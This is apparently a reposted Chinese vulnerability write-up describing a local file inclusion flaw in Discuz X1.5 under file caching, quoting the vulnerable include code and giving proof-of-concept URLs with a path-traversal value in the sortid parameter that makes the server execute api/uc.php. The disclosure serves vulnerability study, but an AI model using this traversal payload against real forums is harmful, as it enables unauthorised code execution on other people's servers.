手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >DISCUZ X1.5 本地文件包含漏洞
DISCUZ X1.5 本地文件包含漏洞
摘要:DISCUZX1.5本地文件包含,当然是有条件的,就是使用文件作为缓存。config_global.php$_config['cache']...

DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。

config_global.php

$_config['cache']['type'] = ‘file’;

function cachedata($cachenames) {

……

$isfilecache = getglobal(‘config/cache/type’) == ‘file’;

……

if($isfilecache) {

$lostcaches = array();

foreach($cachenames as $cachename) {

if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {

$lostcaches[] = $cachename;

}

}

……

}

地址:

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

执行了 api/uc.php 页面代码了。

作者: Jannock

【DISCUZ X1.5 本地文件包含漏洞】相关文章:

恒浪IMS整合系统V4.1 多文件存在SQL注入漏洞

MirOS BSD Korn Shell本地权限提升漏洞

DeDeCMS V5 用户验证函数转义符漏洞

Numara MRchat.pl MRABLoad2.pl远程命令执行漏洞

xyxcms v1.3 小游戏CMS 漏洞说明

DedeCms V5.1 tag.php注入漏洞

DedeCmsV5.6 本地包含又一利用方式

IE 存在document.open()方式地址欺骗漏洞

ECShop 注射漏洞分析

dedecms 5.6的最新注入漏洞

精品推荐
分类导航